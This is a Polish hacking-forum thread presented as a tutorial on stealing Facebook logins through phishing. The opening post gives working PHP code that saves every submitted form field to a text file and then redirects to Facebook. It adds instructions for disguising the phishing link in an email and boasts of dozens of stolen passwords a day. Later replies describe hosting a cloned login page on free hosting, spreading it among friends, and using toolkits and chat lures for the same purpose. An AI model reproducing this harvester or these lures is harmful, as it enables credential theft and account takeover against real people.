[TUTORIAL] Hacking password facebook - phishing

In7ount

Użytkownik
Dołączył
Styczeń 28, 2012
Posty
79
Witajcie , Zaprezentuje wam metodę jaką ja stosuję do zdobywania haseł i loginów do facebooka mając adres email ofiary

No więc
Pierwsze co robię to
1.udaję się na facebook.com
2. Otwieram prawym przyciskiem myszy ( source code ) kod strony
3.Pobieram kod dotyczący logowania

4.Wykorzystuje pobrany kod do stworzenia fake codu .
Kod:
<?php
 header("Location: http://www.Facebook.com/login.php ");
 $handle = fopen("pswrds.txt", "a");
 foreach($_POST as $variable => $value) {
 fwrite($handle, $variable);
 fwrite($handle, "=");
 fwrite($handle, $value);
 fwrite($handle, "\r\n");
 }
 fwrite($handle, "\r\n");
 fclose($handle);
 exit;
 ?>

5.Tworze jakiś podobny email , np [email protected] itd ;p
Wysyłam email do ofiary z odnosnikiem do mojej strony
Wpisuje w wiadomość ( email ) ( gmail.com )
www.facebook.com ale przedtym jakieś powiadomienie , po czym zaznaczam link i naciskam opcje Edit link , i zmieniam odnosnik linku na moja strona a tytul strony pozostaje www.facebook.com

W ten sposób uzyskuje adresy , dziennie około 30 -40 haseł , ale dobre i to ;pp
 
Ostatnia edycja:

littlehalo

Użytkownik
Dołączył
Marzec 14, 2012
Posty
2
nic z tego nie rozumiem.. mógłbys mi krok po kroku dokladniej wytlumaczyc? jestem zielona
 

VR8

Moderator
Członek Załogi
Dołączył
Wrzesień 24, 2011
Posty
325
nic z tego nie rozumiem.. mógłbys mi krok po kroku dokladniej wytlumaczyc? jestem zielona
Raczej nie licz na to że ktoś Ci wytłumaczy to krok po kroku. Nie skacz od razu na głęboką wodę bo się utopisz, zaczyna się od podstaw.
 

josh4vi

Użytkownik
Dołączył
Kwiecień 4, 2012
Posty
27
Ja to zrobiłem w trochę inny sposób. skopiowałem źródło strony startowej fejsa i wstawiłem na darmowy hosting (http://000webhost.com) podmieniłem w tym źródle formularz html aby wysyłał dane logowania do mojego pliku na tym darmowy hostingu, plik ten po odebraniu danych zapisywał je w txt a potem przekierowywał na orginalną stronę fejsbooka (najczęściej ofiara była tam już zalogowana i myślała, że zalogowała się dzięki mojemu "facebookowi". Potem rozpowiedziałem wśród znajomych, że robię podróbę fejsa i rozesłałem ten link. W jeden dzień zyskałem ok. 15 haseł do fejsa moich znajomych i znajomych moich znajomych.
Pzdr. josh4vi
 

sillver

Użytkownik
Dołączył
Kwiecień 20, 2012
Posty
1
mail do uzytkownika...

Przeczuwam potencjalną czkawkę z mailem do delikwenta. Bo jak delikwent skieruje swoje czujne oczęta na adres, z którego przyszło "powiadomienie"? Nieoryginalny mail z fejsa lecz fejk! Lolaboga! Już widzę, jak wchodzi na fejsa i się zabezpiecza, w tym zmiana adresu z którym powiązane jest konto. Teraz będzie już czujny. Taka byłaby moja reakcja... I co wtedy?
Mam tylko jedną szansę podejścia mojego obiektu. Jak zwietrzy podstęp, sprawa przegrana.
 

hack1977

Użytkownik
Dołączył
Kwiecień 22, 2012
Posty
1
hej prosze o pomoc na priva w sprawie stronki phishingowej do facebooka mam z tym straszne problemy a potrzebuje wejsc na jedno konto gg 8776395
 

sm950

Użytkownik
Dołączył
Sierpień 8, 2012
Posty
62
josh4vi jak ty zmieniasz ten formularz html, że ci przesyła loginy i hasła na twój hosting ? a potem do pliku txt ?
 

nowy_me

Użytkownik
Dołączył
Luty 7, 2007
Posty
451
Zdarzało mi się integrować moje aplikacje z Facebookiem, tak że możesz się zalogować do swojej aplikacji używając Facebooka. Oczywiście jak zrobi się to w "oficjalny" sposób to nie zdobywasz hasła do Facebooka, ale mała zmiana w kodzie,strona wyglądała by niemal identycznie(inny URL w popupie), ale zapisywał byś hasła.

Teraz wiele aplikacji korzysta z tworzenia konta na podstawie konta na Facebooku, więc myślę że to by mogło pomóc w przekonaniu userów do podawania haseł.
 

donhubix

Użytkownik
Dołączył
Listopad 25, 2009
Posty
20
@ In7ount

To co opisales mozna podobnie zrobic automatycznie w Social Engineering Toolkicie na BT 4+ (kopia strony i rozsypujesz adres na maile). Ja bym jednak tego nie wysylal na maile tylko rozprowadzal przez gg/chat. Dodaj jedynie koment: Wkurza Cie timeline na fb?-> <adres>.

Hub
 
Do góry Bottom